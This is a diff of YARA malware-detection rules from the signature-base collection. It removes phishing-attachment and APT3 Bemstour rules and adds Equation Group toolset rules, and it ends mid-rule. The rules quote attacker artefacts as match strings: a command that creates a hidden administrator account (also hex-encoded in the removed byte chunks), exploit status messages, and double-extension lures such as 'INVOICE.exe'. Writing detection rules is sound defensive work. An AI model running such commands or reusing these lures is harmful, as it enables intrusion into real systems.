+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "aff27115ac705859871ab1bf14137322d1722f63705d6aeada43d18966843225"
+		hash2 = "7a25e26950bac51ca8d37cec945eb9c38a55fa9a53bc96da53b74378fb10b67e"
 
 	strings:
-		$sl1 = ".lnk"
+		$s1 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%s,%s" fullword ascii
+		$s3 = ",%02d%03d" fullword ascii
+		$s4 = "[%.2u%.2u%.2u%.2u%.2u%.2u]" fullword ascii
+		$op1 = { 7d ec 8d 74 3f 01 0f af f7 c1 c6 05 }
+		$op2 = { 29 f1 89 fb d3 eb 89 f1 d3 e7 }
+		$op3 = { 7d e4 8d 5c 3f 01 0f af df c1 c3 05 }
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 2KB and $sl1 in ( filesize -256 .. filesize )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_ZIP_ISO_Phishattachment_Pattern_Jun22_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Watcher_Linux_I386_V_3_3_0 : FILE
 {
 	meta:
-		description = "Detects suspicious small base64 encoded ZIP files (MIME email attachments) with .iso files as content as often used in phishing attacks"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "638541a6-d2d4-513e-978c-9d1b9f5e3b71"
-		date = "2022-06-23"
+		id = "3c5dc02b-a11a-5c61-8069-641ba90668ec"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_phish_attachments.yar#L23-L41"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1364-L1381"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "21de56d6209050b429c0cce82fd334d1b38a2a3727db5ead06f36fa9d503e193"
-		score = 65
+		logic_hash = "245662b561178f4d929ed858811846b2a49dc80af25396864a3d7bd90d16ac2b"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ce4c9bfa25b8aad8ea68cc275187a894dec5d79e8c0b2f2f3ec4184dc5f402b8"
 
 	strings:
-		$pkzip_base64_1 = { 0A 55 45 73 44 42 }
-		$pkzip_base64_2 = { 0A 55 45 73 44 42 }
-		$pkzip_base64_3 = { 0A 55 45 73 48 43 }
-		$iso_1 = "Lmlzb1BL"
-		$iso_2 = "5pc29QS"
-		$iso_3 = "uaXNvUE"
+		$s1 = "invalid option `" fullword ascii
+		$s8 = "readdir64" fullword ascii
+		$s9 = "89:z89:%r%opw" fullword wide
+		$s13 = "Ropopoprstuvwypypop" fullword wide
+		$s17 = "Missing argument for `-x'." fullword ascii
 
 	condition:
-		filesize < 2000KB and 1 of ( $pk* ) and 1 of ( $iso* )
+		( uint16( 0 ) == 0x457f and filesize < 700KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_Archive_Phishing_Attachment_Characteristics_Jun22_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Charm_Saver_Win2K_V_2_0_0 : FILE
 {
 	meta:
-		description = "Detects characteristics of suspicious file names or double extensions often found in phishing mail attachments"
+		description = "Equation Group hack tool set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3cb8c371-f40b-5773-84d1-3bce37da529e"
-		date = "2022-06-29"
+		id = "9c2e3b70-ffa2-598a-9f99-f7a574b06c14"
+		date = "2017-04-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/0xtoxin/status/1540524891623014400?s=12&t=IQ0OgChk8tAIdTHaPxh0Vg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_phish_attachments.yar#L43-L141"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1383-L1399"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "647044fa3b5cf6f0e9e738fa7b7d24f8918b7a7fb359342e1314d97b50debf87"
-		score = 65
-		quality = 60
+		logic_hash = "87cea1f46a3165485274165e840a4945d6f6a6f9ff7fd011e685e8bb90acae8a"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "caaa5c5733fca95804fffe70af82ee505a8ca2991e4cc05bc97a022e5f5b331c"
-		hash2 = "a746d8c41609a70ce10bc69d459f9abb42957cc9626f2e83810c1af412cb8729"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0f7936a37482532a8ba5df4112643ed7579dd0e59181bfca9c641b9ba0a9912f"
 
 	strings:
-		$sa01 = "INVOICE.exePK" ascii
-		$sa02 = "PAYMENT.exePK" ascii
-		$sa03 = "REQUEST.exePK" ascii
-		$sa04 = "ORDER.exePK" ascii
-		$sa05 = "invoice.exePK" ascii
-		$sa06 = "payment.exePK" ascii
-		$sa07 = "_request.exePK" ascii
-		$sa08 = "_order.exePK" ascii
-		$sa09 = "-request.exePK" ascii
-		$sa10 = "-order.exePK" ascii
-		$sa11 = " request.exePK" ascii
-		$sa12 = " order.exePK" ascii
-		$sa14 = ".doc.exePK" ascii
-		$sa15 = ".docx.exePK" ascii
-		$sa16 = ".xls.exePK" ascii
-		$sa17 = ".xlsx.exePK" ascii
-		$sa18 = ".pdf.exePK" ascii
-		$sa19 = ".ppt.exePK" ascii
-		$sa20 = ".pptx.exePK" ascii
-		$sa21 = ".rtf.exePK" ascii
-		$sa22 = ".txt.exePK" ascii
-		$sb01 = "SU5WT0lDRS5leGVQS"
-		$sb02 = "lOVk9JQ0UuZXhlUE"
-		$sb03 = "JTlZPSUNFLmV4ZVBL"
-		$sb04 = "UEFZTUVOVC5leGVQS"
-		$sb05 = "BBWU1FTlQuZXhlUE"
-		$sb06 = "QQVlNRU5ULmV4ZVBL"
-		$sb07 = "UkVRVUVTVC5leGVQS"
-		$sb08 = "JFUVVFU1QuZXhlUE"
-		$sb09 = "SRVFVRVNULmV4ZVBL"
-		$sb10 = "T1JERVIuZXhlUE"
-		$sb11 = "9SREVSLmV4ZVBL"
-		$sb12 = "PUkRFUi5leGVQS"
-		$sb13 = "aW52b2ljZS5leGVQS"
-		$sb14 = "ludm9pY2UuZXhlUE"
-		$sb15 = "pbnZvaWNlLmV4ZVBL"
-		$sb16 = "cGF5bWVudC5leGVQS"
-		$sb17 = "BheW1lbnQuZXhlUE"
-		$sb18 = "wYXltZW50LmV4ZVBL"
-		$sb19 = "X3JlcXVlc3QuZXhlUE"
-		$sb20 = "9yZXF1ZXN0LmV4ZVBL"
-		$sb21 = "fcmVxdWVzdC5leGVQS"
-		$sb22 = "X29yZGVyLmV4ZVBL"
-		$sb23 = "9vcmRlci5leGVQS"
-		$sb24 = "fb3JkZXIuZXhlUE"
-		$sb25 = "LXJlcXVlc3QuZXhlUE"
-		$sb26 = "1yZXF1ZXN0LmV4ZVBL"
-		$sb27 = "tcmVxdWVzdC5leGVQS"
-		$sb28 = "LW9yZGVyLmV4ZVBL"
-		$sb29 = "1vcmRlci5leGVQS"
-		$sb30 = "tb3JkZXIuZXhlUE"
-		$sb31 = "IHJlcXVlc3QuZXhlUE"
-		$sb32 = "ByZXF1ZXN0LmV4ZVBL"
-		$sb33 = "gcmVxdWVzdC5leGVQS"
-		$sb34 = "IG9yZGVyLmV4ZVBL"
-		$sb35 = "BvcmRlci5leGVQS"
-		$sb36 = "gb3JkZXIuZXhlUE"
-		$sb37 = "LmRvYy5leGVQS"
-		$sb38 = "5kb2MuZXhlUE"
-		$sb39 = "uZG9jLmV4ZVBL"
-		$sb40 = "LmRvY3guZXhlUE"
-		$sb41 = "5kb2N4LmV4ZVBL"
-		$sb42 = "uZG9jeC5leGVQS"
-		$sb43 = "Lnhscy5leGVQS"
-		$sb44 = "54bHMuZXhlUE"
-		$sb45 = "ueGxzLmV4ZVBL"
-		$sb46 = "Lnhsc3guZXhlUE"
-		$sb47 = "54bHN4LmV4ZVBL"
-		$sb48 = "ueGxzeC5leGVQS"
-		$sb49 = "LnBkZi5leGVQS"
-		$sb50 = "5wZGYuZXhlUE"
-		$sb51 = "ucGRmLmV4ZVBL"
-		$sb52 = "LnBwdC5leGVQS"
-		$sb53 = "5wcHQuZXhlUE"
-		$sb54 = "ucHB0LmV4ZVBL"
-		$sb55 = "LnBwdHguZXhlUE"
-		$sb56 = "5wcHR4LmV4ZVBL"
-		$sb57 = "ucHB0eC5leGVQS"
-		$sb58 = "LnJ0Zi5leGVQS"
-		$sb59 = "5ydGYuZXhlUE"
-		$sb60 = "ucnRmLmV4ZVBL"
-		$sb61 = "LnR4dC5leGVQS"
-		$sb62 = "50eHQuZXhlUE"
-		$sb63 = "udHh0LmV4ZVBL"
+		$s2 = "0123456789abcdefABCEDF:" fullword ascii
+		$op0 = { b8 ff ff ff ff 7f 65 eb 30 8b 55 0c 89 d7 0f b6 }
+		$op2 = { ba ff ff ff ff 83 c4 6c 89 d0 5b 5e 5f 5d c3 90 }
 
 	condition:
-		uint16( 0 ) == 0x4b50 and 1 of ( $sa* ) or 1 of ( $sb* )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Apt3_Bemstour_Strings : FILE
+rule SIGNATURE_BASE_Equationgroup_Cursehappy_Win2K_V_6_1_0 : FILE
 {
 	meta:
-		description = "Detects strings used by the Bemstour exploitation tool"
-		author = "Mark Lechtik"
-		id = "8b76e10a-040f-505e-9dff-cd0a689b121e"
-		date = "2019-06-25"
-		modified = "2023-12-04"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt3_bemstour.yar#L1-L64"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7b75d4aa-2cbc-57fc-8fda-015bbc1fb25e"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1401-L1415"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
-		logic_hash = "8aa7491b1dc3595f67ae1229d33f79261616b0f27485b7a27705db63a6111c07"
+		logic_hash = "3bf5878c3be20a7a543d4937c6d820df726062e39ee262a6c31f7e91b32fd55e"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		company = "Check Point Software Technologies LTD."
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "eb669afd246a7ac4de79724abcce5bda38117b3138908b90cac58936520ea632"
 
-	strings:
-		$dbg_print_1 = "leaked address is 0x%llx" ascii wide
-		$dbg_print_2 = "========== %s ==========" ascii wide
-		$dbg_print_3 = "detailVersion:%d" ascii wide
-		$dbg_print_4 = "create pipe twice failed" ascii wide
-		$dbg_print_5 = "WSAStartup function failed with error: %d" ascii wide
-		$dbg_print_6 = "can't open input file." ascii wide
-		$dbg_print_7 = "Allocate Buffer Failed." ascii wide
-		$dbg_print_8 = "Connect to target failed." ascii wide
-		$dbg_print_9 = "connect successful." ascii wide
-		$dbg_print_10 = "not supported Platform" ascii wide
-		$dbg_print_11 = "Wait several seconds." ascii wide
-		$dbg_print_12 = "not set where to write ListEntry ." ascii wide
-		$dbg_print_13 = "backdoor not installed." ascii wide
-		$dbg_print_14 = "REConnect to target failed." ascii wide
-		$dbg_print_15 = "Construct TreeConnectAndX Request Failed." ascii wide
-		$dbg_print_16 = "Construct NTCreateAndXRequest  Failed." ascii wide
-		$dbg_print_17 = "Construct Trans2  Failed." ascii wide
-		$dbg_print_18 = "Construct ConsWXR  Failed." ascii wide
-		$dbg_print_19 = "Construct ConsTransSecondary  Failed." ascii wide
-		$dbg_print_20 = "if you don't want to input password , use server2003 version.." ascii wide
-		$cmdline_1 = "Command format  %s TargetIp domainname username password 2" ascii wide
-		$cmdline_2 = "Command format  %s TargetIp domainname username password 1" ascii wide
-		$cmdline_3 = "cmd.exe /c net user test test /add && cmd.exe /c net localgroup administrators test /add" ascii wide
-		$cmdline_4 = "hello.exe  \"C:\\WINDOWS\\DEBUG\\test.exe\"" ascii wide
-		$cmdline_5 = "parameter not right" ascii wide
-		$smb_param_1 = "browser" ascii wide
-		$smb_param_2 = "spoolss" ascii wide
-		$smb_param_3 = "srvsvc" ascii wide
-		$smb_param_4 = "\\PIPE\\LANMAN" ascii wide
-		$smb_param_5 = "Werttys for Workgroups 3.1a" ascii wide
-		$smb_param_6 = "PC NETWORK PROGRAM 1.0" ascii wide
-		$smb_param_7 = "LANMAN1.0" ascii wide
-		$smb_param_8 = "LM1.2X002" ascii wide
-		$smb_param_9 = "LANMAN2.1" ascii wide
-		$smb_param_10 = "NT LM 0.12" ascii wide
-		$smb_param_12 = "WORKGROUP" ascii wide
-		$smb_param_13 = "Windows Server 2003 3790 Service Pack 2" ascii wide
-		$smb_param_14 = "Windows Server 2003 5.2" ascii wide
-		$smb_param_15 = "Windows 2002 Service Pack 2 2600" ascii wide
-		$smb_param_16 = "Windows 2002 5.1" ascii wide
-		$smb_param_17 = "PC NETWORK PROGRAM 1.0" ascii wide
-		$smb_param_18 = "Windows 2002 5.1" ascii wide
-		$smb_param_19 = "Windows for Workgroups 3.1a" ascii wide
-		$unique_str_1 = "WIN-NGJ7GKNROVS"
-		$unique_str_2 = "XD-A31C2E0087B2"
+	strings:
+		$op1 = { e8 24 2c 01 00 85 c0 89 c6 ba ff ff ff ff 74 d6 }
+		$op2 = { 89 4c 24 04 89 34 24 89 44 24 08 e8 ce 49 ff ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $dbg_print* ) or 2 of ( $cmdline* ) or 1 of ( $unique_str* ) ) and 3 of ( $smb_param* )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Apt3_Bemstour_Implant_Byte_Patch
+rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Store : FILE
 {
 	meta:
-		description = "Detects an implant used by Bemstour exploitation tool (APT3)"
-		author = "Mark Lechtik"
-		id = "c30434c3-8949-566c-b6a6-29bffdaf961d"
-		date = "2019-06-25"
-		modified = "2023-12-04"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt3_bemstour.yar#L69-L104"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "de6de983-fad2-58cf-95be-57109436d5fc"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1417-L1433"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
-		logic_hash = "08de2c885ccb24cb247efdcc06bbcbea144d652744b2d38aaa2aabfd341e4f91"
+		logic_hash = "34dc21d933d56b6f6c342ca110d9cff7bb51d9fd1b88b359861e5b5650679ad0"
 		score = 75
 		quality = 85
-		tags = ""
-		company = "Check Point Software Technologies LTD."
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "619944358bc0e1faffd652b6af0600de055c5e7f1f1d91a8051ed9adf5a5b465"
 
 	strings:
-		$chunk_1 = {
-
-C7 45 ?? 55 8B EC 83
-C7 45 ?? EC 74 53 56
-C7 45 ?? 8B 75 08 33
-C7 45 ?? C9 57 C7 45
-C7 45 ?? 8C 4C 6F 61
-
-}
+		$s1 = "[-] Failed to mmap file: %s" fullword ascii
+		$s2 = "[-] can not NULL terminate input data" fullword ascii
+		$s3 = "Missing argument for `-x'." fullword ascii
+		$s4 = "[!] Value has size of 0!" fullword ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x457f and filesize < 60KB and 2 of them )
 }
-rule SIGNATURE_BASE_Apt3_Bemstour_Implant_Command_Stack_Variable
+rule SIGNATURE_BASE_Equationgroup_Watcher_Linux_X86_64_V_3_3_0 : FILE
 {
 	meta:
-		description = "Detecs an implant used by Bemstour exploitation tool (APT3)"
-		author = "Mark Lechtik"
-		id = "c773da5a-2d3f-5a0a-af2e-28ad382622b3"
-		date = "2019-06-25"
-		modified = "2023-12-04"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt3_bemstour.yar#L107-L275"
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4077242e-a0f2-54a8-afad-f52b8ed874ba"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1435-L1450"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0b28433a2b7993da65e95a45c2adf7bc37edbd2a8db717b85666d6c88140698a"
-		logic_hash = "36710db313a52db2a0c0af356e701d3a36e5597203e87fd7f8586d202738be33"
+		logic_hash = "be2ca3791ef1025db6a1dd6bcdf1a9f0b224c3f7585af4546029840251c50094"
 		score = 75
 		quality = 85
-		tags = ""
-		company = "Check Point Software Technologies LTD."
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a8d65593f6296d6d06230bcede53b9152842f1eee56a2a72b0a88c4f463a09c3"
 
 	strings:
-		$chunk_1 = {
+		$s1 = "forceprismheader" fullword ascii
+		$s2 = "invalid option `" fullword ascii
+		$s3 = "forceprism" fullword ascii
 
-C7 85 ?? ?? ?? ?? 63 6D 64 2E
-C7 85 ?? ?? ?? ?? 65 78 65 20
-C7 85 ?? ?? ?? ?? 2F 63 20 63
-C7 85 ?? ?? ?? ?? 6F 70 79 20
-C7 85 ?? ?? ?? ?? 25 77 69 6E
-C7 85 ?? ?? ?? ?? 64 69 72 25
-C7 85 ?? ?? ?? ?? 5C 73 79 73
-C7 85 ?? ?? ?? ?? 74 65 6D 33
-C7 85 ?? ?? ?? ?? 32 5C 63 6D
-C7 85 ?? ?? ?? ?? 64 2E 65 78
-C7 85 ?? ?? ?? ?? 65 20 25 77
-C7 85 ?? ?? ?? ?? 69 6E 64 69
-C7 85 ?? ?? ?? ?? 72 25 5C 73
-C7 85 ?? ?? ?? ?? 79 73 74 65
-C7 85 ?? ?? ?? ?? 6D 33 32 5C
-C7 85 ?? ?? ?? ?? 73 65 74 68
-C7 85 ?? ?? ?? ?? 63 2E 65 78
-C7 85 ?? ?? ?? ?? 65 20 2F 79
-83 A5 ?? ?? ?? ?? 00
+	condition:
+		( uint16( 0 ) == 0x457f and filesize < 900KB and all of them )
 }
-		$chunk_2 = {
+rule SIGNATURE_BASE_Equationgroup_Linux_Exactchange : FILE
+{
+	meta:
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd9487be-57c5-5352-bce7-f9510166182d"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1452-L1472"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "a0bcf5aa1f434fe9698a7408df68870d4908cdf87f22bb4acfedc50bb2c8f11f"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
+		hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
+		hash3 = "39d4f83c7e64f5b89df9851bdba917cf73a3449920a6925b6cd379f2fdec2a8b"
+		hash4 = "15e12c1c27304e4a68a268e392be4972f7c6edf3d4d387e5b7d2ed77a5b43c2c"
 
-C7 85 ?? ?? ?? ?? 63 6D 64 20
-C7 85 ?? ?? ?? ?? 2F 63 20 22
-C7 85 ?? ?? ?? ?? 6E 65 74 20
-C7 85 ?? ?? ?? ?? 75 73 65 72
-C7 85 ?? ?? ?? ?? 20 63 65 73
-C7 85 ?? ?? ?? ?? 73 75 70 70
-C7 85 ?? ?? ?? ?? 6F 72 74 20
-C7 85 ?? ?? ?? ?? 31 71 61 7A
-C7 85 ?? ?? ?? ?? 23 45 44 43
-C7 85 ?? ?? ?? ?? 20 2F 61 64
-C7 85 ?? ?? ?? ?? 64 20 26 26
-C7 85 ?? ?? ?? ?? 20 6E 65 74
-C7 85 ?? ?? ?? ?? 20 6C 6F 63
-C7 85 ?? ?? ?? ?? 61 6C 67 72
-C7 85 ?? ?? ?? ?? 6F 75 70 20
-C7 85 ?? ?? ?? ?? 61 64 6D 69
-C7 85 ?? ?? ?? ?? 6E 69 73 74
-C7 85 ?? ?? ?? ?? 72 61 74 6F
-C7 85 ?? ?? ?? ?? 72 73 20 63
-C7 85 ?? ?? ?? ?? 65 73 73 75
-C7 85 ?? ?? ?? ?? 70 70 6F 72
-C7 85 ?? ?? ?? ?? 74 20 2F 61
-C7 85 ?? ?? ?? ?? 64 64 22 00
-6A 5C
+	strings:
+		$x1 = "[+] looking for vulnerable socket" fullword ascii
+		$x2 = "can't use 32-bit exploit on 64-bit target" fullword ascii
+		$x3 = "[+] %s socket ready, exploiting..." fullword ascii
+		$x4 = "[!] nothing looks vulnerable, trying everything" fullword ascii
 
+	condition:
+		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
 }
-		$chunk_3 = {
+rule SIGNATURE_BASE_Equationgroup_X86_Linux_Exactchange : FILE
+{
+	meta:
+		description = "Equation Group hack tool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b39e0c6e-b427-5085-99f8-88b2e00bb110"
+		date = "2017-04-09"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1474-L1490"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "9365eb74a364eb83150672919ea1abe635465fe3239fff26ba91037c74971466"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
+		hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
 
-C7 45 ?? 57 69 6E 45
-C7 45 ?? 78 65 63 00
-C7 45 ?? 47 65 74 50
-C7 45 ?? 72 6F 63 41
-C7 45 ?? 64 64 72 65
-C7 45 ?? 73 73 00 00
-C7 45 ?? 43 72 65 61
-C7 45 ?? 74 65 46 69
-C7 45 ?? 6C 65 41 00
-C7 45 ?? 57 72 69 74
-C7 45 ?? 65 46 69 6C
-C7 45 ?? 65 00 00 00
-C7 45 ?? 43 6C 6F 73
-C7 45 ?? 65 48 61 6E
-C7 45 ?? 64 6C 65 00
-89 4D ??
+	strings:
+		$x1 = "kernel has 4G/4G split, not exploitable" fullword ascii
+		$x2 = "[+] kernel stack size is %d" fullword ascii
 
+	condition:
+		( uint16( 0 ) == 0x457f and filesize < 1000KB and 1 of them )
 }
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eclipsedwing_Rpcproxy_Pcdlllauncher : FILE
+{
+	meta:
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8dd15424-e1b5-5543-97d5-3b3a83faa428"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1502-L1519"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "8a01ea872c161521301182b922ece893f9ad1a33d902ec94963946f3b07d7266"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "48251fb89c510fb3efa14c4b5b546fbde918ed8bb25f041a801e3874bd4f60f8"
+		hash2 = "237c22f4d43fdacfcbd6e1b5f1c71578279b7b06ea8e512b4b6b50f10e8ccf10"
+		hash3 = "79a584c127ac6a5e96f02a9c5288043ceb7445de2840b608fc99b55cf86507ed"
+
+	strings:
+		$x1 = "[-] Failed to Prepare Payload!" fullword ascii
+		$x2 = "ShellcodeStartOffset" fullword ascii
+		$x3 = "[*] Waiting for AuthCode from exploit" fullword ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Explodingcantouch_1_2_1 : FILE
 {
 	meta:
-		description = "Detects Red Delta samples"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "47417488-e843-5346-9baa-fcce30b884d1"
-		date = "2020-10-14"
+		id = "66a09bfc-992d-5152-9fd6-9d7bcfb8b92f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_reddelta.yar#L2-L29"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1521-L1536"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1f2406563b863b8ccd0fd8d8d33c576c4b82dabb55a1e4fa8291859323389834"
+		logic_hash = "9239a61e71c86fc239f75baa9c781da18553e3c502495ad7429eaf3c744e870c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "30b2bbce0ca4cb066721c94a64e2c37b7825dd72fc19c20eb0ab156bea0f8efc"
-		hash2 = "42ed73b1d5cc49e09136ec05befabe0860002c97eb94e9bad145e4ea5b8be2e2"
-		hash3 = "480a8c883006232361c5812af85de9799b1182f1b52145ccfced4fa21b6daafa"
-		hash4 = "7ea7c6406c5a80d3c15511c4d97ec1e45813e9c58431f386710d0486c4898b98"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0cdde7472b077610d0068aa7e9035da89fe5d435549749707cae24495c8d8444"
 
 	strings:
-		$x1 = "InjectShellCode" ascii fullword
-		$s1 = "DotNetLoader.exe" wide ascii fullword
-		$s2 = "clipboardinject" ascii fullword
-		$s3 = "download.php?raw=1" wide
-		$s4 = "Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Levint" wide
-		$s5 = "FlashUpdate.exe" wide
-		$s6 = "raw_cc_url" ascii fullword
-		$op1 = { 48 8b 4c 24 78 48 89 01 e9 1a ff ff ff 48 8b 44 }
-		$op2 = { ff ff 00 00 77 2a 8b 44 24 38 8b 8c 24 98 }
+		$x1 = "[-] Connection closed by remote host (TCP Ack/Fin)" fullword ascii
+		$s2 = "[!]Warning: Error on first request - path size may actually be larger than indicated." fullword ascii
+		$s4 = "<http://%s/%s> (Not <locktoken:write1>) <http://%s/>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 or 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_2 : FILE
